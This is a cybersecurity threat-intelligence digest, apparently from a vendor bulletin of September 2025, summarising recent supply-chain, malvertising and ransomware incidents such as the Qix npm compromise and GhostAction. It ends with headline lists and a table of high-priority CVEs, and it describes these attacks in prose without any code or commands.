Skip to main content Skip to footer 
Popular Qix npm packages compromised following phishing email attack
Aikido and Socket researchers discovered malicious code within 18 popular npm packages that have a combined 2 billion downloads per week. The packages were found to contain code that silently intercepts cryptocurrency and Web3 activity in the browser, manipulates wallet interactions, and rewrites payment destinations. The maintainer of the packages, Josh Junon or ‘Qix,’ has since confirmed being a victim of a phishing attack and stated he is in the process of cleaning up the compromised packages. Further compromised packages by other maintainers have since also been identified.
GPUGate leverages Google Ads and GitHub Desktop to deliver malicious files
On August 19th, 2025, Arctic Wolf researchers observed threat actors leveraging a new attack technique, dubbed GPUGate, abusing GitHub’s repository structure alongside Google Ads to direct users toward a malicious download hosted on a spoofed domain. The delivered malware is unique, with a 128MB Microsoft Software Installer evading most existing security sandboxes, while a GPU-gated decryption routine keeps the payload encrypted on systems without a real GPU. The campaign exclusively targets Western European entities, particularly the information technology sector.
GhostAction injects malicious workflows into GitHub repositories for secrets theft
On September 5th, 2025, GitGuardian discovered a mass supply chain attack, dubbed GhostAction, that has impacted 327 GitHub users across 817 repositories. The attacker first enumerated secrets from legitimate workflow files and then hardcoded the secret names into malicious workflows, which were then injected into the targeted repositories. A total of 3,325 secrets were exfiltrated, including PyPI, npm, and Docker Hub tokens via HTTP POST requests to a remote endpoint. Several companies have had their entire SDK portfolio compromised, with malicious workflows affecting their Python, Rust, JavaScript, and Golang repositories simultaneously. The affected projects and users were alerted following the discovery. A total of 100 repositories have already reverted the malicious changes.
Malicious scans for outdated and vulnerable network equipment surges
Eclypsium researchers warned of a surge in malicious scans for old, outdated, and vulnerable network equipment. The scans affect consumer and enterprise equipment and are traced to compromised Cisco Small Business RV series, Linksys LRT series, and Araknis Networks (AN-300-RT-4L2W) routers. Almost all the affected devices are end of life and no longer receive firmware updates, with only Linksys providing some extended support.
Meta malvertising campaigns install malicious browser extensions
Bitdefender researchers detailed a new malvertising campaign on Meta that leverages malicious ads and video tutorials to guide users through downloading and installing a seemingly legitimate browser extension. The tutorial is advertised as a process to unlock the blue verification tick on Facebook or other special features but instead installs an extension featuring artificial intelligence (AI)-generated code, written in Vietnamese, that is capable of stealing user data. The extension harvests session cookies from Facebook and the victim’s IP address, which is sent to a Telegram bot. Some variants also interact directly with the Facebook Graph API via stolen access tokens, allowing attackers to identify Facebook Business Accounts, which are then exfiltrated and offered for sale on Telegram channels. To date, 37 malicious ads are promoting the extension, all of which are advertised by the same Facebook account.
Ransomware
“LockerGoga,” “MegaCortex,” and “Nefilim” Ransomware Administrator Charged with Ransomware AttacksJusticeGov – Press Release – Sep 09 2025Unmasking The Gentlemen Ransomware: Tactics, Techniques, and Procedures RevealedTrend Micro – Sep 09 2025LockBit Attempts Comeback with LockBit 5.0 Ransomware ReleaseThe Cyber Express – Sep 08 2025Blurring the Lines: Intrusion Shows Connection With Three Major Ransomware GangsThe DFIR Report – Blog – Sep 08 2025The crazy, true story behind the first AI-powered ransomwareTheRegister.com – Sep 05 2025
Financial Services
$41 Million Stolen in SwissBorg Crypto Hack Linked to Third-Party APIInfoTech News – Sep 11 2025Voice phishing-linked frozen bank accounts set to hit record high this yearThe Korea Times News – Sep 11 2025LunoBotnet:-A-Self-Healing Linux BotnetCyble Blog – Sep 09 2025The Rise of RatOn: From NFC heists to remote control and ATSThreat Fabric Blog – Sep 09 2025Malicious npm Packages Impersonate Flashbots SDKs, Targeting Ethereum Wallet CredentialsSocket – Sep 05 2025
Geopolitics
Frankenstein Variant of the ToneShell Backdoor Targeting MyanmarIntezer – Sep 10 2025Chinese APT Deploys EggStreme Fileless Malware to Breach Philippine Military SystemsThe Hacker News – Sep 10 2025New Buterat Backdoor Malware Found in Enterprise and Government NetworksHackRead – Sep 10 2025U.S. probes malware email targeting trade talks with China, WSJ reportsReuters – Sep 07 2025Undersea cables cut in the Red Sea, disrupting internet access in Asia and the MideastAP News – Sep 07 2025
High Priority Vulnerabilities
| Name | Software | Base Score | Temp Score | |
|---|---|---|---|---|
| CVE-2025-55234 | Windows | 8.8 | 7.7 | |
| Related: Two zero-days and multiple critical flaws patched across Microsoft products | ||||
| CVE-2025-42957 | S-4HANA | 9.9 | 8.4 | |
| Related: Critical code injection flaw in SAP S/4HANA actively exploited | ||||
| CVE-2025-54236 | Commerce | 9.1 | 7.0 | |
| Related: SessionReaper, a critical bug in Magento & Adobe Commerce (CVE-2025-54236) – Sansec | ||||
| CVE-2025-42944 | Netweaver | 10.0 | 9.4 | |
| Related: Critical and high-severity flaws patched across SAP products | ||||
| CVE-2024-40766 | SonicOS | 9.8 | 7.0 | |
| Related: Akira ransomware group exploits multiple security risks in SonicWall appliances | ||||